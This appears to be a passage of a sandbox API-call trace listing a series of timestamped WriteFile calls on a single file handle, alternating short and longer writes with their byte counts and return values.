	[0102.410] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.410] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x4c, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x4c, lpOverlapped=0x0) returned 1
	[0102.411] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.411] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x4d, lpOverlapped=0x0) returned 1
	[0102.411] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.411] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0xb, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0xb, lpOverlapped=0x0) returned 1
	[0102.411] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.412] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x53, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x53, lpOverlapped=0x0) returned 1
	[0102.412] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.412] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x31, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x31, lpOverlapped=0x0) returned 1
	[0102.412] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.412] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x10, lpOverlapped=0x0) returned 1
	[0102.412] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.412] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x39, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x39, lpOverlapped=0x0) returned 1
	[0102.413] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.413] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x4a, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x4a, lpOverlapped=0x0) returned 1
	[0102.413] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.413] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x56, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x56, lpOverlapped=0x0) returned 1
	[0102.413] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.414] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0xd, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0xd, lpOverlapped=0x0) returned 1
	[0102.414] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.414] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x45, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x45, lpOverlapped=0x0) returned 1
	[0102.414] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.414] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x15, lpOverlapped=0x0) returned 1
	[0102.414] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.415] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x37, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x37, lpOverlapped=0x0) returned 1
	[0102.415] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.415] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x38, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x38, lpOverlapped=0x0) returned 1
	[0102.415] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.416] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x4a, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x4a, lpOverlapped=0x0) returned 1
	[0102.416] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.416] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x58, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x58, lpOverlapped=0x0) returned 1
	[0102.416] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.416] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x1c, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x1c, lpOverlapped=0x0) returned 1
	[0102.416] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.417] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x22, lpOverlapped=0x0) returned 1
	[0102.417] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.417] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x18, lpOverlapped=0x0) returned 1
	[0102.417] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.417] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x30, lpOverlapped=0x0) returned 1
	[0102.417] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.418] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x46, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x46, lpOverlapped=0x0) returned 1
	[0102.418] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.418] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x51, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x51, lpOverlapped=0x0) returned 1
	[0102.418] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.418] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x3e, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x3e, lpOverlapped=0x0) returned 1
	[0102.419] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.419] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x4e, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x4e, lpOverlapped=0x0) returned 1
	[0102.419] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.419] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x3d, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x3d, lpOverlapped=0x0) returned 1
	[0102.419] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.420] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x4a, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x4a, lpOverlapped=0x0) returned 1
	[0102.420] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.420] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x2c, lpOverlapped=0x0) returned 1
	[0102.421] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.421] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x1f, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x1f, lpOverlapped=0x0) returned 1
	[0102.421] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.421] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x31, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x31, lpOverlapped=0x0) returned 1
	[0102.421] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.422] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x38, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x38, lpOverlapped=0x0) returned 1
	[0102.422] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.422] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x13, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x13, lpOverlapped=0x0) returned 1
	[0102.422] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.422] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x55, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x55, lpOverlapped=0x0) returned 1
	[0102.422] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.422] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x14, lpOverlapped=0x0) returned 1
	[0102.423] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.423] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x30, lpOverlapped=0x0) returned 1
	[0102.423] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.423] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x44, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x44, lpOverlapped=0x0) returned 1
	[0102.423] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.424] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x56, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x56, lpOverlapped=0x0) returned 1
	[0102.424] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.424] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x24, lpOverlapped=0x0) returned 1
	[0102.424] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.424] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x20, lpOverlapped=0x0) returned 1
	[0102.424] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.425] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x15, lpOverlapped=0x0) returned 1
	[0102.425] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.425] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x20, lpOverlapped=0x0) returned 1
	[0102.425] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.425] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x2d, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x2d, lpOverlapped=0x0) returned 1
	[0102.425] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.426] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x37, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x37, lpOverlapped=0x0) returned 1
	[0102.426] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.426] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x1d, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x1d, lpOverlapped=0x0) returned 1
	[0102.426] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.426] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x35, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x35, lpOverlapped=0x0) returned 1
	[0102.426] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.426] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x10, lpOverlapped=0x0) returned 1
	[0102.426] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.427] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x3a, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x3a, lpOverlapped=0x0) returned 1
	[0102.427] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.427] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x4f, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x4f, lpOverlapped=0x0) returned 1
	[0102.427] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.428] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x50, lpOverlapped=0x0) returned 1
	[0102.428] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.428] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x1d, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x1d, lpOverlapped=0x0) returned 1
	[0102.428] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.428] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x34, lpOverlapped=0x0) returned 1
	[0102.428] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.429] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x4d, lpOverlapped=0x0) returned 1
	[0102.429] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
	[0102.429] WriteFile (in: hFile=0x258, lpBuffer=0x128924*, nNumberOfBytesToWrite=0x45, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128924*, lpNumberOfBytesWritten=0x128910*=0x45, lpOverlapped=0x0) returned 1
	[0102.429] WriteFile (in: hFile=0x258, lpBuffer=0x128900*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x128910, lpOverlapped=0x0 | out: lpBuffer=0x128900*, lpNumberOfBytesWritten=0x128910*=0x2, lpOverlapped=0x0) returned 1
